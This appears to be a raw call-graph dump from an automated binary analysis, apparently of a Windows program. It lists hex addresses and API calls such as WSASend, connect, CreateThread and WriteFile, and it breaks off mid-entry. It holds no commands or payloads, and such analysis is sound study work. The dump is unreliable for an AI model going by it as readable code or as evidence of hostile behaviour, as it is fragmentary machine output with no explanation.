20259->20093 20261 2ae0a79 20260->20261 20262 2ad513d 20260->20262 20263 2ae32e7 __cinit 68 API calls 20261->20263 20262->20105 20263->20262 20265 2ae0a50 Mailbox 68 API calls 20264->20265 20267 2ada672 20265->20267 20266 2ad519d 20266->20111 20266->20114 20266->20115 20267->20266 20274 2ad2db5 20267->20274 20270 2ae0a50 Mailbox 68 API calls 20269->20270 20272 2adce26 20270->20272 20271 2adcf35 20271->20111 20272->20271 20301 2ad2b95 20272->20301 20275 2ad2dca 20274->20275 20276 2ad2de4 20274->20276 20277 2ae0a50 Mailbox 68 API calls 20275->20277 20278 2ad2dfc 20276->20278 20280 2ad2def 20276->20280 20279 2ad2dcf 20277->20279 20288 2ad2d39 WSASetLastError WSASend 20278->20288 20279->20267 20282 2ae0a50 Mailbox 68 API calls 20280->20282 20282->20279 20283 2ad2e0c 20283->20279 20284 2ad2e54 WSASetLastError select 20283->20284 20285 2ae0a50 68 API calls Mailbox 20283->20285 20287 2ad2d39 71 API calls 20283->20287 20298 2ada43c 20284->20298 20285->20283 20287->20283 20289 2ada43c 69 API calls 20288->20289 20290 2ad2d6e 20289->20290 20291 2ad2d75 20290->20291 20292 2ad2d82 20290->20292 20294 2ae0a50 Mailbox 68 API calls 20291->20294 20293 2ad2d7a 20292->20293 20295 2ae0a50 Mailbox 68 API calls 20292->20295 20296 2ad2d9c 20293->20296 20297 2ae0a50 Mailbox 68 API calls 20293->20297 20294->20293 20295->20293 20296->20283 20297->20296 20299 2ae0a50 Mailbox 68 API calls 20298->20299 20300 2ada448 WSAGetLastError 20299->20300 20300->20283 20302 2ad2bc7 20301->20302 20303 2ad2bb1 20301->20303 20304 2ad2bdf 20302->20304 20306 2ad2bd2 20302->20306 20305 2ae0a50 Mailbox 68 API calls 20303->20305 20307 2ad2be2 WSASetLastError WSARecv 20304->20307 20308 2ad2bb6 20304->20308 20311 2ad2d22 20304->20311 20312 2ae0a50 68 API calls Mailbox 20304->20312 20314 2ad2cbc WSASetLastError select 20304->20314 20305->20308 20309 2ae0a50 Mailbox 68 API calls 20306->20309 20310 2ada43c 69 API calls 20307->20310 20308->20272 20309->20308 20310->20304 20316 2ad1996 20311->20316 20312->20304 20315 2ada43c 69 API calls 20314->20315 20315->20304 20317 2ad19bb 20316->20317 20318 2ad199f 20316->20318 20317->20308 20319 2ae32e7 __cinit 68 API calls 20318->20319 20319->20317 20342 2ade1b3 20320->20342 20322 2add033 20322->20133 20427 2ae32fc 20323->20427 20326 2ae2054 20326->20135 20327 2ae207d ResumeThread 20327->20135 20328 2ae2076 CloseHandle 20328->20327 20330 2ae0a50 Mailbox 68 API calls 20329->20330 20331 2ad3fb8 20330->20331 20746 2ad1815 20331->20746 20334 2ada5be 20335 2ada5c8 __EH_prolog 20334->20335 20752 2adcb76 20335->20752 20343 2ade1bd __EH_prolog 20342->20343 20348 2ad4030 20343->20348 20347 2ade1eb 20347->20322 20360 2af5330 20348->20360 20350 2ad403a GetProcessHeap RtlAllocateHeap 20351 2ad407c 20350->20351 20352 2ad4053 std::exception::exception 20350->20352 20351->20347 20354 2ad408a 20351->20354 20361 2ada5fd 20352->20361 20355 2ad4094 __EH_prolog 20354->20355 20408 2ada21c 20355->20408 20360->20350 20362 2ada607 __EH_prolog 20361->20362 20369 2adcbac 20362->20369 20368 2ada635 20378 2add70c 20369->20378 20372 2adcbc6 20400 2add744 20372->20400 20374 2ada624 20375 2ae449a 20374->20375 20376 2ae44b9 RaiseException 20375->20376 20376->20368 20381 2ae2453 20378->20381 20384 2ae2481 20381->20384 20385 2ae248f 20384->20385 20389 2ada616 20384->20389 20390 2ae2517 20385->20390 20389->20372 20391 2ae2494 20390->20391 20392 2ae2520 20390->20392 20391->20389 20394 2ae24d9 20391->20394 20393 2ae2eb4 _free 59 API calls 20392->20393 20393->20391 20395 2ae24e5 _strlen 20394->20395 20396 2ae250a 20394->20396 20397 2ae2eec _malloc 59 API calls 20395->20397 20396->20389 20398 2ae24f7 20397->20398 20398->20396 20399 2ae6bfc __fltout2 59 API calls 20398->20399 20399->20396 20401 2add74e __EH_prolog 20400->20401 20404 2adb66f 20401->20404 20403 2add785 Mailbox 20403->20374 20405 2adb679 __EH_prolog 20404->20405 20406 2ae2453 std::exception::exception 59 API calls 20405->20406 20407 2adb68a Mailbox 20406->20407 20407->20403 20419 2adb033 20408->20419 20411 2ad3fdc 20426 2af5330 20411->20426 20413 2ad3fe6 CreateEventA 20414 2ad3ffd 20413->20414 20415 2ad400f 20413->20415 20416 2ad3fb0 Mailbox 68 API calls 20414->20416 20415->20347 20417 2ad4005 20416->20417 20418 2ada5be Mailbox 60 API calls 20417->20418 20418->20415 20420 2ad40c1 20419->20420 20421 2adb03f 20419->20421 20420->20411 20422 2ae3a8f _Allocate 60 API calls 20421->20422 20423 2adb04f std::exception::exception 20421->20423 20422->20423 20423->20420 20424 2ae449a __CxxThrowException@8 RaiseException 20423->20424 20425 2adfa64 20424->20425 20426->20413 20428 2ae331e 20427->20428 20429 2ae330a 20427->20429 20431 2ae89ac __calloc_crt 59 API calls 20428->20431 20430 2ae5d9b __read_nolock 59 API calls 20429->20430 20432 2ae330f 20430->20432 20433 2ae332b 20431->20433 20434 2ae4e35 __read_nolock 9 API calls 20432->20434 20435 2ae337c 20433->20435 20437 2ae5b9a _strtok 59 API calls 20433->20437 20440 2ae204b 20434->20440 20436 2ae2eb4 _free 59 API calls 20435->20436 20438 2ae3382 20436->20438 20439 2ae3338 20437->20439 20438->20440 20446 2ae5d7a 20438->20446 20441 2ae5c21 __initptd 59 API calls 20439->20441 20440->20326 20440->20327 20440->20328 20442 2ae3341 CreateThread 20441->20442 20442->20440 20445 2ae3374 GetLastError 20442->20445 20454 2ae345c 20442->20454 20445->20435 20451 2ae5d67 20446->20451 20448 2ae5d83 _free 20449 2ae5d9b __read_nolock 59 API calls 20448->20449 20450 2ae5d96 20449->20450 20450->20440 20452 2ae5bb2 __getptd_noexit 59 API calls 20451->20452 20453 2ae5d6c 20452->20453 20453->20448 20455 2ae3465 __threadstartex@4 20454->20455 20456 2ae910b __CRT_INIT@12 TlsGetValue 20455->20456 20457 2ae346b 20456->20457 20458 2ae349e 20457->20458 20459 2ae3472 __threadstartex@4 20457->20459 20460 2ae5a2f __freefls@4 59 API calls 20458->20460 20461 2ae912a __CRT_INIT@12 TlsSetValue 20459->20461 20463 2ae34b9 ___crtIsPackagedApp 20460->20463 20462 2ae3481 20461->20462 20465 2ae3487 GetLastError RtlExitUserThread 20462->20465 20466 2ae3494 GetCurrentThreadId 20462->20466 20464 2ae34cd 20463->20464 20470 2ae3404 20463->20470 20476 2ae3395 20464->20476 20465->20466 20466->20463 20471 2ae340d LoadLibraryExW GetProcAddress 20470->20471 20472 2ae3446 RtlDecodePointer 20470->20472 20473 2ae342f 20471->20473 20474 2ae3430 RtlEncodePointer 20471->20474 20475 2ae3456 20472->20475 20473->20464 20474->20472 20475->20464 20477 2ae33a1 ___BuildCatchObject 20476->20477 20478 2ae5b9a _strtok 59 API calls 20477->20478 20479 2ae33a6 20478->20479 20486 2ae20a0 20479->20486 20504 2ae1550 20486->20504 20489 2ae20e8 TlsSetValue 20490 2ae20f0 20489->20490 20526 2addce7 20490->20526 20524 2ae15b4 20504->20524 20505 2ae1630 20507 2ae1646 20505->20507 20509 2ae1643 CloseHandle 20505->20509 20506 2ae15cc 20508 2ae160e ResetEvent 20506->20508 20512 2ae15e5 OpenEventA 20506->20512 20542 2ae1b50 20506->20542 20510 2ae448b _strtok 6 API calls 20507->20510 20511 2ae1615 20508->20511 20509->20507 20514 2ae165e 20510->20514 20546 2ae1790 20511->20546 20516 2ae15ff 20512->20516 20517 2ae1607 20512->20517 20513 2ae16dc WaitForSingleObject 20513->20524 20514->20489 20514->20490 20516->20517 20520 2ae1604 CloseHandle 20516->20520 20517->20508 20517->20511 20518 2ae16b0 CreateEventA 20518->20524 20519 2ae15e2 20519->20512 20520->20517 20522 2ae1b50 GetCurrentProcessId 20522->20524 20524->20505 20524->20506 20524->20513 20524->20518 20524->20522 20525 2ae16ce CloseHandle 20524->20525 20525->20524 20527 2addd09 20526->20527 20556 2ae0bb0 20542->20556 20544 2ae1ba2 GetCurrentProcessId 20545 2ae1bb5 20544->20545 20545->20519 20547 2ae179f 20546->20547 20550 2ae17d5 CreateEventA 20547->20550 20551 2ae1b50 GetCurrentProcessId 20547->20551 20553 2ae17f7 20547->20553 20548 2ae162d 20548->20505 20549 2ae1803 SetEvent 20549->20548 20552 2ae17eb 20550->20552 20550->20553 20554 2ae17d2 20551->20554 20552->20553 20553->20548 20553->20549 20554->20550 20556->20544 20749 2ae2413 20746->20749 20750 2ae24d9 std::exception::_Copy_str 59 API calls 20749->20750 20751 2ad182a 20750->20751 20751->20334 20758 2add63d 20752->20758 20755 2adcb90 20767 2add675 20755->20767 20761 2adb161 20758->20761 20762 2adb16b __EH_prolog 20761->20762 20763 2ae2453 std::exception::exception 59 API calls 20762->20763 20764 2adb17c 20763->20764 20765 2ad7c31 std::bad_exception::bad_exception 60 API calls 20764->20765 20766 2ada5dd 20765->20766 20766->20755 20768 2add67f __EH_prolog 20767->20768 20771 2adb559 20768->20771 20772 2adb563 __EH_prolog 20771->20772 20773 2adb161 std::bad_exception::bad_exception 60 API calls 20772->20773 20796 2ad353e 20775->20796 20779 2ad2ae8 WSASetLastError connect 20778->20779 20780 2ad2ad8 20778->20780 20782 2ada43c 69 API calls 20779->20782 20781 2ae0a50 Mailbox 68 API calls 20780->20781 20786 2ad2add 20781->20786 20783 2ad2b07 20782->20783 20784 2ae0a50 Mailbox 68 API calls 20783->20784 20783->20786 20784->20786 20785 2ae0a50 Mailbox 68 API calls 20787 2ad2b1b 20785->20787 20786->20785 20788 2ae0a50 Mailbox 68 API calls 20787->20788 20790 2ad2b38 20787->20790 20788->20790 20792 2ad2b87 20790->20792 20856 2ad3027 20790->20856 20792->20148 20795 2ae0a50 Mailbox 68 API calls 20795->20792 20797 2ad3548 __EH_prolog 20796->20797 20798 2ad3557 20797->20798 20799 2ad3576 20797->20799 20801 2ad1996 68 API calls 20798->20801 20818 2ad2edd WSASetLastError WSASocketA 20799->20818 20815 2ad355f 20801->20815 20803 2ad35ad CreateIoCompletionPort 20804 2ad35db 20803->20804 20805 2ad35c5 GetLastError 20803->20805 20807 2ae0a50 Mailbox 68 API calls 20804->20807 20806 2ae0a50 Mailbox 68 API calls 20805->20806 20808 2ad35d2 20806->20808 20807->20808 20809 2ad35ef 20808->20809 20810 2ad3626 20808->20810 20811 2ae0a50 Mailbox 68 API calls 20809->20811 20844 2adde26 20810->20844 20812 2ad3608 20811->20812 20826 2ad29ee 20812->20826 20815->20145 20816 2ad3659 20817 2ae0a50 Mailbox 68 API calls 20816->20817 20817->20815 20819 2ae0a50 Mailbox 68 API calls 20818->20819 20820 2ad2f0a WSAGetLastError 20819->20820 20821 2ad2f41 20820->20821 20822 2ad2f21 20820->20822 20821->20803 20821->20815 20823 2ad2f3c 20822->20823 20824 2ad2f27 setsockopt 20822->20824 20825 2ae0a50 Mailbox 68 API calls 20823->20825 20824->20823 20825->20821 20827 2ad2a0c 20826->20827 20828 2ad2aad 20826->20828 20829 2ad2a39 WSASetLastError closesocket 20827->20829 20833 2ae0a50 Mailbox 68 API calls 20827->20833 20830 2ae0a50 Mailbox 68 API calls 20828->20830 20832 2ad2ab8 20828->20832 20831 2ada43c 69 API calls 20829->20831 20830->20832 20834 2ad2a51 20831->20834 20832->20815 20835 2ad2a21 20833->20835 20834->20828 20837 2ae0a50 Mailbox 68 API calls 20834->20837 20848 2ad2f50 20835->20848 20839 2ad2a5c 20837->20839 20840 2ad2a7b ioctlsocket WSASetLastError closesocket 20839->20840 20841 2ae0a50 Mailbox 68 API calls 20839->20841 20842 2ada43c 69 API calls 20840->20842 20843 2ad2a6e 20841->20843 20842->20828 20843->20828 20843->20840 20845 2adde30 __EH_prolog 20844->20845 20846 2ae3a8f _Allocate 60 API calls 20845->20846 20847 2adde44 20846->20847 20847->20816 20849 2ad2f5b 20848->20849 20850 2ad2f70 WSASetLastError setsockopt 20848->20850 20851 2ae0a50 Mailbox 68 API calls 20849->20851 20852 2ada43c 69 API calls 20850->20852 20854 2ad2a36 20851->20854 20853 2ad2f9e 20852->20853 20853->20854 20855 2ae0a50 Mailbox 68 API calls 20853->20855 20854->20829 20855->20854 20857 2ad304d WSASetLastError select 20856->20857 20858 2ad303b 20856->20858 20860 2ada43c 69 API calls 20857->20860 20859 2ae0a50 Mailbox 68 API calls 20858->20859 20863 2ad2b59 20859->20863 20861 2ad3095 20860->20861 20862 2ae0a50 Mailbox 68 API calls 20861->20862 20861->20863 20862->20863 20863->20792 20864 2ad2fb4 20863->20864 20865 2ad2fd5 WSASetLastError getsockopt 20864->20865 20866 2ad2fc0 20864->20866 20868 2ada43c 69 API calls 20865->20868 20867 2ae0a50 Mailbox 68 API calls 20866->20867 20870 2ad2b7a 20867->20870 20869 2ad300f 20868->20869 20869->20870 20871 2ae0a50 Mailbox 68 API calls 20869->20871 20870->20792 20870->20795 20871->20870 20879 2af5330 20872->20879 20874 2ad32b5 RtlEnterCriticalSection 20875 2ae0a50 Mailbox 68 API calls 20874->20875 20876 2ad32d6 20875->20876 20880 2ad3307 20876->20880 20879->20874 20882 2ad3311 __EH_prolog 20880->20882 20883 2ad3350 20882->20883 20892 2ad7db5 20882->20892 20896 2ad239d 20883->20896 20886 2ae0a50 Mailbox 68 API calls 20888 2ad337c 20886->20888 20890 2ad2d39 71 API calls 20888->20890 20891 2ad3390 20890->20891 20902 2ad7d5e 20891->20902 20893 2ad7dc3 20892->20893 20895 2ad7e39 20893->20895 20906 2ad891a 20893->20906 20895->20882 20897 2ad23ab 20896->20897 20898 2ad2417 20897->20898 20899 2ad23c1 PostQueuedCompletionStatus 20897->20899 20901 2ad23f8 InterlockedExchange RtlLeaveCriticalSection 20897->20901 20898->20886 20898->20891 20899->20897 20900 2ad23da RtlEnterCriticalSection 20899->20900 20900->20897 20901->20897 20903 2ad7d63 20902->20903 20904 2ad32ee RtlLeaveCriticalSection 20903->20904 20922 2ad1e7f 20903->20922 20904->20164 20907 2ad8944 20906->20907 20908 2ad7d5e 68 API calls 20907->20908 20909 2ad898a 20908->20909 20910 2ad89b1 20909->20910 20912 2ada1a7 20909->20912 20910->20895 20913 2ada1c1 20912->20913 20914 2ada1b1 20912->20914 20913->20910 20914->20913 20917 2adfa65 20914->20917 20918 2ae2413 std::exception::exception 59 API calls 20917->20918 20919 2adfa7d 20918->20919 20920 2ae449a __CxxThrowException@8 RaiseException 20919->20920 20921 2adfa92 20920->20921 20923 2ae0a50 Mailbox 68 API calls 20922->20923 20924 2ad1e90 20923->20924 20924->20903 20926 2ae21bb _LocaleUpdate::_LocaleUpdate 59 API calls 20925->20926 20927 2ae22d7 20926->20927 20928 2ae22e5 20927->20928 20934 2ae22fc 20927->20934 20929 2ae5d9b __read_nolock 59 API calls 20928->20929 20930 2ae22ea 20929->20930 20931 2ae4e35 __read_nolock 9 API calls 20930->20931 20932 2ae22f5 ___ascii_stricmp 20931->20932 20932->20175 20933 2ae58ba 66 API calls __tolower_l 20933->20934 20934->20932 20934->20933 20936 2ae27cb 20935->20936 20937 2ae5d9b __read_nolock 59 API calls 20936->20937 20940 2ae27db _strlen 20936->20940 20938 2ae27d0 20937->20938 20939 2ae4e35 __read_nolock 9 API calls 20938->20939 20939->20940 20940->20181 20942 2addf3d __EH_prolog 20941->20942 20943 2ae3a8f _Allocate 60 API calls 20942->20943 20944 2addf54 20943->20944 20944->20200 20946 2ada645 GetProcessHeap HeapFree 20945->20946 20946->20206 20948 2ae21bb _LocaleUpdate::_LocaleUpdate 59 API calls 20947->20948 20949 2ae6005 20948->20949 20950 2ae5d9b __read_nolock 59 API calls 20949->20950 20951 2ae600a 20950->20951 20952 2ae6adb 20951->20952 20966 2ae602a __output_l __aulldvrm _strlen 20951->20966 20992 2ae9d71 20951->20992 20953 2ae5d9b __read_nolock 59 API calls 20952->20953 20955 2ae6ae0 20953->20955 20957 2ae4e35 __read_nolock 9 API calls 20955->20957 20956 2ae6ab5 20958 2ae448b _strtok 6 API calls 20956->20958 20957->20956 20959 2ae23b6 20958->20959 20959->20218 20971 2ae5e41 20959->20971 20961 2ae6b10 79 API calls _write_multi_char 20961->20966 20962 2ae6693 RtlDecodePointer 20962->20966 20963 2ae6b58 79 API calls _write_multi_char 20963->20966 20964 2ae2eb4 _free 59 API calls 20964->20966 20965 2ae6b84 79 API calls _write_string 20965->20966 20966->20952 20966->20956 20966->20961 20966->20962 20966->20963 20966->20964 20966->20965 20967 2ae89f4 __malloc_crt 59 API calls 20966->20967 20968 2ae66f6 RtlDecodePointer 20966->20968 20969 2ae671b RtlDecodePointer 20966->20969 20970 2aefa24 61 API calls __cftof 20966->20970 20999 2aedc4e 20966->20999 20967->20966 20968->20966 20969->20966 20970->20966 20972 2ae9d71 __ungetc_nolock 59 API calls 20971->20972 20973 2ae5e4f 20972->20973 20974 2ae5e5a 20973->20974 20975 2ae5e71 20973->20975 20977 2ae5d9b __read_nolock 59 API calls 20974->20977 20976 2ae5e76 20975->20976 20985 2ae5e83 __flsbuf 20975->20985 20978 2ae5d9b __read_nolock 59 API calls 20976->20978 20979 2ae5e5f 20977->20979 20978->20979 20979->20218 20980 2ae5ee7 20983 2ae5f01 20980->20983 20986 2ae5f18 20980->20986 20981 2ae5f61 20982 2ae9d95 __write 79 API calls 20981->20982 20982->20979 21014 2ae9d95 20983->21014 20985->20979 20988 2ae5ed2 20985->20988 20991 2ae5edd 20985->20991 21002 2aef6e2 20985->21002 20986->20979 21042 2aef736 20986->21042 20988->20991 21011 2aef8a5 20988->21011 20991->20980 20991->20981 20993 2ae9d7b 20992->20993 20994 2ae9d90 20992->20994 20995 2ae5d9b __read_nolock 59 API calls 20993->20995 20994->20966 20996 2ae9d80 20995->20996 20997 2ae4e35 __read_nolock 9 API calls 20996->20997 20998 2ae9d8b 20997->20998 20998->20966 21000 2ae21bb _LocaleUpdate::_LocaleUpdate 59 API calls 20999->21000 21001 2aedc5f 21000->21001 21001->20966 21003 2aef6ed 21002->21003 21004 2aef6fa 21002->21004 21005 2ae5d9b __read_nolock 59 API calls 21003->21005 21006 2ae5d9b __read_nolock 59 API calls 21004->21006 21008 2aef706 21004->21008 21007 2aef6f2 21005->21007 21009 2aef727 21006->21009 21007->20988 21008->20988 21010 2ae4e35 __read_nolock 9 API calls 21009->21010 21010->21007 21012 2ae89f4 __malloc_crt 59 API calls 21011->21012 21013 2aef8ba 21012->21013 21013->20991 21015 2ae9da1 ___BuildCatchObject 21014->21015 21016 2ae9dae 21015->21016 21017 2ae9dc5 21015->21017 21018 2ae5d67 __read_nolock 59 API calls 21016->21018 21019 2ae9e64 21017->21019 21022 2ae9dd9 21017->21022 21021 2ae9db3 21018->21021 21020 2ae5d67 __read_nolock 59 API calls 21019->21020 21023 2ae9dfc 21020->21023 21024 2ae5d9b __read_nolock 59 API calls 21021->21024 21025 2ae9df7 21022->21025 21026 2ae9e01 21022->21026 21029 2ae5d9b __read_nolock 59 API calls 21023->21029 21037 2ae9dba ___BuildCatchObject 21024->21037 21028 2ae5d67 __read_nolock 59 API calls 21025->21028 21067 2af0bc7 21026->21067 21028->21023 21031 2ae9e70 21029->21031 21030 2ae9e07 21032 2ae9e2d 21030->21032 21033 2ae9e1a 21030->21033 21034 2ae4e35 __read_nolock 9 API calls 21031->21034 21036 2ae5d9b __read_nolock 59 API calls 21032->21036 21076 2ae9e84 21033->21076 21034->21037 21039 2ae9e32 21036->21039 21037->20979 21038 2ae9e26 21135 2ae9e5c 21038->21135 21040 2ae5d67 __read_nolock 59 API calls 21039->21040 21040->21038 21043 2aef742 ___BuildCatchObject 21042->21043 21044 2aef76b 21043->21044 21045 2aef753 21043->21045 21047 2aef810 21044->21047 21051 2aef7a0 21044->21051 21046 2ae5d67 __read_nolock 59 API calls 21045->21046 21048 2aef758 21046->21048 21049 2ae5d67 __read_nolock 59 API calls 21047->21049 21050 2ae5d9b __read_nolock 59 API calls 21048->21050 21052 2aef815 21049->21052 21053 2aef760 ___BuildCatchObject 21050->21053 21054 2af0bc7 ___lock_fhandle 60 API calls 21051->21054 21055 2ae5d9b __read_nolock 59 API calls 21052->21055 21053->20979 21056 2aef7a6 21054->21056 21057 2aef81d 21055->21057 21058 2aef7bc 21056->21058 21059 2aef7d4 21056->21059 21060 2ae4e35 __read_nolock 9 API calls 21057->21060 21061 2aef832 __lseeki64_nolock 61 API calls 21058->21061 21062 2ae5d9b __read_nolock 59 API calls 21059->21062 21060->21053 21064 2aef7cb 21061->21064 21063 2aef7d9 21062->21063 21065 2ae5d67 __read_nolock 59 API calls 21063->21065 21168 2aef808 21064->21168 21065->21064 21068 2af0bd3 ___BuildCatchObject 21067->21068 21069 2af0c22 RtlEnterCriticalSection 21068->21069 21070 2ae882d __lock 59 API calls 21068->21070 21071 2af0c48 ___BuildCatchObject 21069->21071 21072 2af0bf8 21070->21072 21071->21030 21073 2af0c10 21072->21073 21074 2ae914c __mtinitlocks InitializeCriticalSectionAndSpinCount 21072->21074 21138 2af0c4c 21073->21138 21074->21073 21077 2ae9e91 __write_nolock 21076->21077 21078 2ae9eef 21077->21078 21079 2ae9ed0 21077->21079 21110 2ae9ec5 21077->21110 21084 2ae9f47 21078->21084 21085 2ae9f2b 21078->21085 21081 2ae5d67 __read_nolock 59 API calls 21079->21081 21080 2ae448b _strtok 6 API calls 21082 2aea6e5 21080->21082 21083 2ae9ed5 21081->21083 21082->21038 21086 2ae5d9b __read_nolock 59 API calls 21083->21086 21087 2ae9f60 21084->21087 21142 2aef832 21084->21142 21088 2ae5d67 __read_nolock 59 API calls 21085->21088 21089 2ae9edc 21086->21089 21091 2aef6e2 __read_nolock 59 API calls 21087->21091 21092 2ae9f30 21088->21092 21093 2ae4e35 __read_nolock 9 API calls 21089->21093 21094 2ae9f6e 21091->21094 21095 2ae5d9b __read_nolock 59 API calls 21092->21095 21093->21110 21097 2aea2c7 21094->21097 21101 2ae5b9a _strtok 59 API calls 21094->21101 21096 2ae9f37 21095->21096 21098 2ae4e35 __read_nolock 9 API calls 21096->21098 21099 2aea65a WriteFile 21097->21099 21100 2aea2e5 21097->21100 21098->21110 21102 2aea2ba GetLastError 21099->21102 21112 2aea287 21099->21112 21103 2aea409 21100->21103 21109 2aea2fb 21100->21109 21105 2ae9f9a GetConsoleMode 21101->21105 21102->21112 21113 2aea414 21103->21113 21127 2aea4fe 21103->21127 21104 2aea693 21104->21110 21111 2ae5d9b __read_nolock 59 API calls 21104->21111 21105->21097 21106 2ae9fd9 21105->21106 21106->21097 21107 2ae9fe9 GetConsoleCP 21106->21107 21107->21104 21131 2aea018 21107->21131 21108 2aea36a WriteFile 21108->21102 21108->21109 21109->21104 21109->21108 21109->21112 21110->21080 21112->21104 21112->21110 21115 2aea3e7 21112->21115 21113->21104 21113->21112 21117 2aea479 WriteFile 21113->21117 21119 2aea68a 21115->21119 21120 2aea3f2 21115->21120 21116 2aea573 WideCharToMultiByte 21116->21102 21116->21127 21117->21102 21117->21113 21122 2ae5d9b __read_nolock 59 API calls 21120->21122 21123 2aea5c2 WriteFile 21123->21127 21128 2aea615 GetLastError 21123->21128 21127->21104 21127->21112 21127->21116 21127->21123 21128->21127 21131->21102 21131->21112 21167 2af0f6d RtlLeaveCriticalSection 21135->21167 21137 2ae9e62 21137->21037 21141 2ae8997 RtlLeaveCriticalSection 21138->21141 21140 2af0c53 21140->21069 21141->21140 21154 2af0e84 21142->21154 21144 2aef842 21145 2aef84a 21144->21145 21146 2aef85b SetFilePointerEx 21144->21146 21147 2ae5d9b __read_nolock 59 API calls 21145->21147 21148 2aef873 GetLastError 21146->21148 21149 2aef84f 21146->21149 21147->21149 21150 2ae5d7a __dosmaperr 59 API calls 21148->21150 21149->21087 21150->21149 21155 2af0e8f 21154->21155 21156 2af0ea4 21154->21156 21157 2ae5d67 __read_nolock 59 API calls 21155->21157 21158 2ae5d67 __read_nolock 59 API calls 21156->21158 21162 2af0ec9 21156->21162 21159 2af0e94 21157->21159 21160 2af0ed3 21158->21160 21161 2ae5d9b __read_nolock 59 API calls 21159->21161 21163 2ae5d9b __read_nolock 59 API calls 21160->21163 21164 2af0e9c 21161->21164 21162->21144 21165 2af0edb 21163->21165 21164->21144 21166 2ae4e35 __read_nolock 9 API calls 21165->21166 21166->21164 21167->21137 21171 2af0f6d RtlLeaveCriticalSection 21168->21171 21170 2aef80e 21170->21053 21171->21170 21172->20222 21174 2ade26d __EH_prolog 21173->21174 21175 2ae3a8f _Allocate 60 API calls 21174->21175 21176 2ade276 21175->21176 21177 2ad1bfa RtlEnterCriticalSection 21176->21177 21179 2ade484 21176->21179 21177->20227 21180 2ade48e __EH_prolog 21179->21180 21183 2ad26db RtlEnterCriticalSection 21180->21183 21182 2ade4e4 21182->21177 21184 2ad2728 CreateWaitableTimerA 21183->21184 21186 2ad277e 21183->21186 21187 2ad2738 GetLastError 21184->21187 21188 2ad275b SetWaitableTimer 21184->21188 21185 2ad27d5 RtlLeaveCriticalSection 21185->21182 21186->21185 21189 2ae3a8f _Allocate 60 API calls 21186->21189 21190 2ae0a50 Mailbox 68 API calls 21187->21190 21188->21186 21191 2ad278a 21189->21191 21192 2ad2745 21190->21192 21194 2ae3a8f _Allocate 60 API calls 21191->21194 21198 2ad27c8 21191->21198 21227 2ad1712 21192->21227 21196 2ad27a9 21194->21196 21199 2ad1cf8 CreateEventA 21196->21199 21233 2ad7d36 21198->21233 21200 2ad1d23 GetLastError 21199->21200 21201 2ad1d52 CreateEventA 21199->21201 21205 2ad1d33 21200->21205 21202 2ad1d6b GetLastError 21201->21202 21203 2ad1d96 21201->21203 21206 2ad1d7b 21202->21206 21204 2ae32fc __beginthreadex 201 API calls 21203->21204 21207 2ad1db6 21204->21207 21208 2ae0a50 Mailbox 68 API calls 21205->21208 21209 2ae0a50 Mailbox 68 API calls 21206->21209 21210 2ad1e0d 21207->21210 21211 2ad1dc6 GetLastError 21207->21211 21212 2ad1d3c 21208->21212 21213 2ad1d84 21209->21213 21214 2ad1e1d 21210->21214 21215 2ad1e11 WaitForSingleObject FindCloseChangeNotification 21210->21215 21219 2ad1dd8 21211->21219 21216 2ad1712 60 API calls 21212->21216 21218 2ad1712 60 API calls 21213->21218 21214->21198 21215->21214 21217 2ad1d4e 21216->21217 21217->21201 21218->21203 21220 2ad1ddc CloseHandle 21219->21220 21221 2ad1ddf 21219->21221 21220->21221 21222 2ad1dee 21221->21222 21223 2ad1de9 CloseHandle 21221->21223 21224 2ae0a50 Mailbox 68 API calls 21222->21224 21223->21222 21225 2ad1dfb 21224->21225 21226 2ad1712 60 API calls 21225->21226 21226->21210 21229 2ad171c __EH_prolog 21227->21229 21228 2ad173e 21228->21188 21229->21228 21230 2ad1815 Mailbox 59 API calls 21229->21230 21231 2ad1732 21230->21231 21236 2ada3d5 21231->21236 21234 2ad7d52 21233->21234 21235 2ad7d43 CloseHandle 21233->21235 21234->21185 21235->21234 21237 2ada3df __EH_prolog 21236->21237 21244 2adc93a 21237->21244 21241 2ada400 21242 2ae449a __CxxThrowException@8 RaiseException 21241->21242 21243 2ada40e 21242->21243 21245 2adb161 std::bad_exception::bad_exception 60 API calls 21244->21245 21246 2ada3f2 21245->21246 21247 2adc976 21246->21247 21248 2adc980 __EH_prolog 21247->21248 21251 2adb110 21248->21251 21250 2adc9af Mailbox 21250->21241 21252 2adb11a __EH_prolog 21251->21252 21253 2adb161 std::bad_exception::bad_exception 60 API calls 21252->21253 21254 2adb12b Mailbox 21253->21254 21254->21250 21266 2ad30ae WSASetLastError 21255->21266 21258 2ad30ae 71 API calls 21259 2ad3c90 21258->21259 21260 2ad16ae 21259->21260 21261 2ad16b8 __EH_prolog 21260->21261 21262 2ad1701 21261->21262 21263 2ae2413 std::exception::exception 59 API calls 21261->21263 21262->20093 21264 2ad16dc 21263->21264 21265 2ada3d5 60 API calls 21264->21265 21265->21262 21267 2ad30ec WSAStringToAddressA 21266->21267 21268 2ad30ce 21266->21268 21270 2ada43c 69 API calls 21267->21270 21268->21267 21269 2ad30d3 21268->21269 21271 2ae0a50 Mailbox 68 API calls 21269->21271 21272 2ad3114 21270->21272 21279 2ad30d8 21271->21279 21273 2ad3154 21272->21273 21275 2ad311e _memcmp 21272->21275 21276 2ae0a50 Mailbox 68 API calls 21273->21276 21280 2ad3135 21273->21280 21274 2ad3193 21274->21279 21281 2ae0a50 Mailbox 68 API calls 21274->21281 21278 2ae0a50 Mailbox 68 API calls 21275->21278 21275->21280 21276->21280 21277 2ae0a50 Mailbox 68 API calls 21277->21274 21278->21280 21279->21258 21279->21259 21280->21274 21280->21277 21281->21279 21283 2ad3bdd __EH_prolog 21282->21283 21284 2ad3bfe htonl htonl 21283->21284 21294 2ae23f7 21283->21294 21284->20242 21289 2ad3c20 __EH_prolog 21288->21289 21290 2ad3c41 21289->21290 21291 2ae23f7 std::bad_exception::bad_exception 59 API calls 21289->21291 21290->20242 21292 2ad3c35 21291->21292 21293 2ada58a 60 API calls 21292->21293 21293->21290 21295 2ae2413 std::exception::exception 59 API calls 21294->21295 21296 2ad3bf2 21295->21296 21297 2ada58a 21296->21297 21298 2ada594 __EH_prolog 21297->21298 21305 2adcaad 21298->21305 21302 2ada5af 21303 2ae449a __CxxThrowException@8 RaiseException 21302->21303 21304 2ada5bd 21303->21304 21312 2ae23dc 21305->21312 21308 2adcae9 21309 2adcaf3 __EH_prolog 21308->21309 21315 2adb47f 21309->21315 21311 2adcb22 Mailbox 21311->21302 21313 2ae2453 std::exception::exception 59 API calls 21312->21313 21314 2ada5a1 21313->21314 21314->21308 21316 